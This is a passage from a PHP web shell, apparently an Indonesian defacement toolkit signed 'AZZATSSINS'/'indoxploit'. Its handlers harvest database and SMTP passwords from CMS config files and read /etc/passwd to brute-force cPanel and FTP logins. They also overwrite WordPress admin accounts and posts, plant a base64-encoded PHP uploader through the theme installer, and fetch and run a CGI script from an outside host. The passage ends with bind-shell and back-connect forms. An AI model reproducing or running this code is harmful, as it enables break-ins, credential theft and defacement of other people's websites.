1818.         $cp_pass = cp_pass($dir);
1819.         echo $cp_pass;
1820.         echo "</textarea><br>
1821.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1822.         </form>
1823. <br></center>";
1824.     }
1825. } elseif($_GET['do'] == 'cpftp_auto') {
1826.     if($_POST['crack']) {
1827.         $usercp = explode("\r\n", $_POST['user_cp']);
1828.         $passcp = explode("\r\n", $_POST['pass_cp']);
1829.         $i = 0;
1830.         foreach($usercp as $ucp) {
1831.             foreach($passcp as $pcp) {
1832.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1833.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1834.                     } else {
1835.                         $_SESSION[$ucp] = "1";
1836.                         $_SESSION[$pcp] = "1";
1837.                         if($ucp == '' || $pcp == '') {
1838.                             //
1839.                         } else {
1840.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1841.                             $ftp_conn = ftp_connect($ip);
1842.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1843.                             if((!$ftp_login) || (!$ftp_conn)) {
1844.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
1845.                             } else {
1846.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
1847.                                 $fi = htmlspecialchars($_POST['file_deface']);
1848.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1849.                                 if($deface) {
1850.                                     $i++;
1851.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
1852.                                     if(function_exists('posix_getpwuid')) {
1853.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1854.                                         if($domain_cp == '') {
1855.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1856.                                         } else {
1857.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1858.                                             foreach($domains_cp[1] as $dj) {
1859.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1860.                                                 $user_cp_url = $user_cp_url['name'];
1861.                                                 if($user_cp_url == $ucp) {
1862.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1863.                                                     break;
1864.                                                 }
1865.                                             }
1866.                                         }
1867.                                     } else {
1868.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1869.                                     }
1870.                                 } else {
1871.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
1872.                                 }
1873.                             }
1874.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1875.                         }
1876.                     }
1877.                 }
1878.             }
1879.         }
1880.         if($i == 0) {
1881.         } else {
1882.             echo "<br>Success Deface ".$i." Cpanel";
1883.         }
1884.     } else {
1885.         echo "<center>
1886.         <form method='post'>
1887.         Filename: <br>
1888.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1889.         Deface Page: <br>
1890.         <input type='text' name='deface' placeholder='http://wget.yu.tl/files/lol.css' style='width: 450px;'><br>
1891.         USER: <br>
1892.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1893.         $_usercp = fopen("/etc/passwd","r");
1894.         while($getu = fgets($_usercp)) {
1895.             if($getu == '' || !$_usercp) {
1896.                 echo "<font color=red>Can't read /etc/passwd</font>";
1897.             } else {
1898.                 preg_match_all("/(.*?):x:/", $getu, $u);
1899.                 foreach($u[1] as $user_cp) {
1900.                         if(is_dir("/home/$user_cp/public_html")) {
1901.                             echo "$user_cp\n";
1902.                     }
1903.                 }
1904.             }
1905.         }
1906.         echo "</textarea><br>
1907.         PASS: <br>
1908.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1909.         function cp_pass($dir) {
1910.             $pass = "";
1911.             $dira = scandir($dir);
1912.             foreach($dira as $dirb) {
1913.                 if(!is_file("$dir/$dirb")) continue;
1914.                 $ambil = file_get_contents("$dir/$dirb");
1915.                 if(preg_match("/WordPress/", $ambil)) {
1916.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1917.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1918.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1919.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1920.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1921.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1922.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1923.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1924.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1925.                 } elseif(preg_match("/client/", $ambil)) {
1926.                     preg_match("/password=(.*)/", $ambil, $pass1);
1927.                     if(preg_match('/"/', $pass1[1])) {
1928.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1929.                         $pass .= $pass1[1]."\n";
1930.                     }
1931.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1932.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1933.                 }
1934.             }
1935.             echo $pass;
1936.         }
1937.         $cp_pass = cp_pass($dir);
1938.         echo $cp_pass;
1939.         echo "</textarea><br>
1940.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1941.         </form>
1942. <br></center>";
1943.     }
1944. } elseif($_GET['do'] == 'smtp') {
1945.     echo "<br>";
1946.     function scj($dir) {
1947.         $dira = scandir($dir);
1948.         foreach($dira as $dirb) {
1949.             if(!is_file("$dir/$dirb")) continue;
1950.             $ambil = file_get_contents("$dir/$dirb");
1951.             $ambil = str_replace("$", "", $ambil);
1952.             if(preg_match("/JConfig|joomla/", $ambil)) {
1953.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1954.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1955.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1956.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1957.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1958.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1959.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1960.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1961.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1962.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1963.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1964.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1965.             }
1966.         }
1967.     }
1968.     $smpt_hunter = scj($dir);
1969.     echo $smpt_hunter;
1970. } elseif($_GET['do'] == 'auto_wp') {
1971.     if($_POST['hajar']) {
1972.         $title = htmlspecialchars($_POST['new_title']);
1973.         $pn_title = str_replace(" ", "-", $title);
1974.         if($_POST['cek_edit'] == "Y") {
1975.             $script = $_POST['edit_content'];
1976.         } else {
1977.             $script = $title;
1978.         }
1979.         $conf = $_POST['config_dir'];
1980.         $scan_conf = scandir($conf);
1981.         foreach($scan_conf as $file_conf) {
1982.             if(!is_file("$conf/$file_conf")) continue;
1983.             $config = file_get_contents("$conf/$file_conf");
1984.             if(preg_match("/WordPress/", $config)) {
1985.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1986.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1987.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1988.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1989.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1990.                 $prefix = $dbprefix."posts";
1991.                 $option = $dbprefix."options";
1992.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1993.                 $db = mysql_select_db($dbname);
1994.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1995.                 $result = mysql_fetch_array($q);
1996.                 $id = $result[ID];
1997.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1998.                 $result2 = mysql_fetch_array($q2);
1999.                 $target = $result2[option_value];
2000.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
2001.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
2002.                 echo "<div style='margin: 5px auto;'>";
2003.                 if($target == '') {
2004.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
2005.                 } else {
2006.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
2007.                 }
2008.                 if(!$update OR !$conn OR !$db) {
2009.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
2010.                 } else {
2011.                     echo "<font color=lime>sukses di ganti.</font><br>";
2012.                 }
2013.                 echo "</div>";
2014.                 mysql_close($conn);
2015.             }
2016.         }
2017.     } else {
2018.         echo "<center>
2019.         <h1>Auto Edit Title+Content WordPress</h1>
2020.         <form method='post'>
2021.         DIR Config: <br>
2022.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2023.         Set Title: <br>
2024.         <input type='text' name='new_title' value='Hacked by AZZATSSINS' placeholder='New Title'><br><br>
2025.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
2026.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
2027.         <textarea name='edit_content' placeholder='http://wget.yu.tl/files/lol.css' style='width: 450px; height: 150px;'></textarea><br>
2028.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
2029.         </form>
2030. <br>
2031.         ";
2032.     }
2033. } elseif($_GET['do'] == 'zoneh') {
2034.     if($_POST['submit']) {
2035.         $domain = explode("\r\n", $_POST['url']);
2036.         $nick =  $_POST['nick'];
2037.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
2038.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
2039.         function zoneh($url,$nick) {
2040.             $ch = curl_init("http://www.zone-h.com/notify/single");
2041.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2042.                   curl_setopt($ch, CURLOPT_POST, true);
2043.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2044.             return curl_exec($ch);
2045.                   curl_close($ch);
2046.         }
2047.         foreach($domain as $url) {
2048.             $zoneh = zoneh($url,$nick);
2049.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2050.                 echo "$url -> <font color=lime>OK</font><br>";
2051.             } else {
2052.                 echo "$url -> <font color=red>ERROR</font><br>";
2053.             }
2054.         }
2055.     } else {
2056.         echo "<center><form method='post'>
2057.         <u>Defacer</u>: <br>
2058.         <input type='text' name='nick' size='50' value='AZZATSSINS'><br>
2059.         <u>Domains</u>: <br>
2060.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2061.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2062.         </form>";
2063.     }
2064.     echo "</center>";
2065. } elseif($_GET['do'] == 'cgi') {
2066.     $cgi_dir = mkdir('azx_cgi', 0755);
2067.     $file_cgi = "azx_cgi/cgi.izo";
2068.     $isi_htcgi = "AddHandler cgi-script .izo";
2069.     $htcgi = fopen(".htaccess", "w");
2070.     $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
2071.     $cgi = fopen($file_cgi, "w");
2072.     fwrite($cgi, $cgi_script);
2073.     fwrite($htcgi, $isi_htcgi);
2074.     chmod($file_cgi, 0755);
2075.     echo "<iframe src='azx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2076. } elseif($_GET['do'] == 'auto_dwp') {
2077.     if($_POST['auto_deface_wp']) {
2078.         function anucurl($sites) {
2079.             $ch = curl_init($sites);
2080.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2081.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2082.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2083.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2084.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2085.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2086.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2087.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2088.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2089.             $data = curl_exec($ch);
2090.                   curl_close($ch);
2091.             return $data;
2092.         }
2093.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2094.             $post = array(
2095.                    "log" => "$userr",
2096.                    "pwd" => "$pass",
2097.                    "rememberme" => "forever",
2098.                    "wp-submit" => "$wp_submit",
2099.                    "redirect_to" => "$web",
2100.                    "testcookie" => "1",
2101.                    );
2102.             $ch = curl_init($cek);
2103.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2104.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2105.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2106.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2107.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2108.                   curl_setopt($ch, CURLOPT_POST, 1);
2109.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2110.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2111.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2112.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2113.             $data = curl_exec($ch);
2114.                   curl_close($ch);
2115.             return $data;
2116.         }
2117.         $scan = $_POST['link_config'];
2118.         $link_config = scandir($scan);
2119.         $script = htmlspecialchars($_POST['script']);
2120.         $user = "indoxploit";
2121.         $pass = "indoxploit";
2122.         $passx = md5($pass);
2123.         foreach($link_config as $dir_config) {
2124.             if(!is_file("$scan/$dir_config")) continue;
2125.             $config = file_get_contents("$scan/$dir_config");
2126.             if(preg_match("/WordPress/", $config)) {
2127.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
2128.                 $dbuser = ambilkata($config,"DB_USER', '","'");
2129.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2130.                 $dbname = ambilkata($config,"DB_NAME', '","'");
2131.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
2132.                 $prefix = $dbprefix."users";
2133.                 $option = $dbprefix."options";
2134.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2135.                 $db = mysql_select_db($dbname);
2136.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2137.                 $result = mysql_fetch_array($q);
2138.                 $id = $result[ID];
2139.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2140.                 $result2 = mysql_fetch_array($q2);
2141.                 $target = $result2[option_value];
2142.                 if($target == '') {                
2143.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2144.                 } else {
2145.                     echo "[+] $target <br>";
2146.                 }
2147.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2148.                 if(!$conn OR !$db OR !$update) {
2149.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2150.                     mysql_close($conn);
2151.                 } else {
2152.                     $site = "$target/wp-login.php";
2153.                     $site2 = "$target/wp-admin/theme-install.php?upload";
2154.                     $b1 = anucurl($site2);
2155.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2156.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2157.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2158.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2159.                     $www = "m.php";
2160.                     $fp5 = fopen($www,"w");
2161.                     fputs($fp5,$upload3);
2162.                     $post2 = array(
2163.                             "_wpnonce" => "$anu2",
2164.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2165.                             "themezip" => "@$www",
2166.                             "install-theme-submit" => "Install Now",
2167.                             );
2168.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2169.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2170.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2171.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2172.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2173.                           curl_setopt($ch, CURLOPT_POST, 1);
2174.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2175.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2176.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2177.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2178.                     $data3 = curl_exec($ch);
2179.                           curl_close($ch);
2180.                     $y = date("Y");
2181.                     $m = date("m");
2182.                     $namafile = "id.php";
2183.                     $fpi = fopen($namafile,"w");
2184.                     fputs($fpi,$script);
2185.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2186.                            curl_setopt($ch6, CURLOPT_POST, true);
2187.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2188.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2189.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2190.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2191.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2192.                     $postResult = curl_exec($ch6);
2193.                            curl_close($ch6);
2194.                     $as = "$target/k.php";
2195.                     $bs = anucurl($as);
2196.                     if(preg_match("#$script#is", $bs)) {
2197.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2198.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2199.                         } else {
2200.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
2201.                         echo "[!!] coba aja manual: <br>";
2202.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2203.                         echo "[+] username: <font color=lime>$user</font><br>";
2204.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
2205.                         }
2206.                     mysql_close($conn);
2207.                 }
2208.             }
2209.         }
2210.     } else {
2211.         echo "<center><h1>WordPress Auto Deface</h1>
2212.         <form method='post'>
2213.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2214.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by AZZATSSINS' required><br>
2215.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2216.         </form>
2217.         <br>        </center>";
2218.     }
2219. } elseif($_GET['do'] == 'auto_dwp2') {
2220.     if($_POST['auto_deface_wp']) {
2221.         function anucurl($sites) {
2222.             $ch = curl_init($sites);
2223.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2224.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2225.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2226.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2227.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2228.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2229.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2230.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2231.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2232.             $data = curl_exec($ch);
2233.                   curl_close($ch);
2234.             return $data;
2235.         }
2236.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2237.             $post = array(
2238.                    "log" => "$userr",
2239.                    "pwd" => "$pass",
2240.                    "rememberme" => "forever",
2241.                    "wp-submit" => "$wp_submit",
2242.                    "redirect_to" => "$web",
2243.                    "testcookie" => "1",
2244.                    );
2245.             $ch = curl_init($cek);
2246.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2247.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2248.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2249.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2250.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2251.                   curl_setopt($ch, CURLOPT_POST, 1);
2252.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2253.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2254.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2255.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2256.             $data = curl_exec($ch);
2257.                   curl_close($ch);
2258.             return $data;
2259.         }
2260.         $link = explode("\r\n", $_POST['link']);
2261.         $script = htmlspecialchars($_POST['script']);
2262.         $user = "indoxploit";
2263.         $pass = "indoxploit";
2264.         $passx = md5($pass);
2265.         foreach($link as $dir_config) {
2266.             $config = anucurl($dir_config);
2267.             $dbhost = ambilkata($config,"DB_HOST', '","'");
2268.             $dbuser = ambilkata($config,"DB_USER', '","'");
2269.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2270.             $dbname = ambilkata($config,"DB_NAME', '","'");
2271.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
2272.             $prefix = $dbprefix."users";
2273.             $option = $dbprefix."options";
2274.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2275.             $db = mysql_select_db($dbname);
2276.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2277.             $result = mysql_fetch_array($q);
2278.             $id = $result[ID];
2279.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2280.             $result2 = mysql_fetch_array($q2);
2281.             $target = $result2[option_value];
2282.             if($target == '') {                
2283.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2284.             } else {
2285.                 echo "[+] $target <br>";
2286.             }
2287.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2288.             if(!$conn OR !$db OR !$update) {
2289.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2290.                 mysql_close($conn);
2291.             } else {
2292.                 $site = "$target/wp-login.php";
2293.                 $site2 = "$target/wp-admin/theme-install.php?upload";
2294.                 $b1 = anucurl($site2);
2295.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2296.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2297.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2298.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2299.                 $www = "m.php";
2300.                 $fp5 = fopen($www,"w");
2301.                 fputs($fp5,$upload3);
2302.                 $post2 = array(
2303.                         "_wpnonce" => "$anu2",
2304.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2305.                         "themezip" => "@$www",
2306.                         "install-theme-submit" => "Install Now",
2307.                         );
2308.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2309.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2310.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2311.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2312.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2313.                       curl_setopt($ch, CURLOPT_POST, 1);
2314.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2315.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2316.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2317.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2318.                 $data3 = curl_exec($ch);
2319.                       curl_close($ch);
2320.                 $y = date("Y");
2321.                 $m = date("m");
2322.                 $namafile = "id.php";
2323.                 $fpi = fopen($namafile,"w");
2324.                 fputs($fpi,$script);
2325.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2326.                        curl_setopt($ch6, CURLOPT_POST, true);
2327.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2328.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2329.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2330.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2331.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2332.                 $postResult = curl_exec($ch6);
2333.                        curl_close($ch6);
2334.                 $as = "$target/k.php";
2335.                 $bs = anucurl($as);
2336.                 if(preg_match("#$script#is", $bs)) {
2337.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2338.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2339.                     } else {
2340.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
2341.                     echo "[!!] coba aja manual: <br>";
2342.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2343.                     echo "[+] username: <font color=lime>$user</font><br>";
2344.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
2345.                     }
2346.                 mysql_close($conn);
2347.             }
2348.         }
2349.     } else {
2350.         echo "<center><h1>WordPress Auto Deface V.2</h1>
2351.         <form method='post'>
2352.         Link Config: <br>
2353.         <textarea name='link' placeholder='http://target.com/configs/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2354.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by AZZATSSINS' required><br>
2355.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2356.         </form></center>";
2357.     }
2358. } elseif($_GET['do'] == 'network') {
2359.     echo "<form method='post'>
2360.     <u>Bind Port:</u> <br>
2361.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2362.     <input type='submit' name='sub_bp' value='>>'>
2363.     </form>
2364.     <form method='post'>
2365.     <u>Back Connect:</u> <br>
2366.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2367.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2368.     <input type='submit' name='sub_bc' value='>>'>
2369.     </form>";
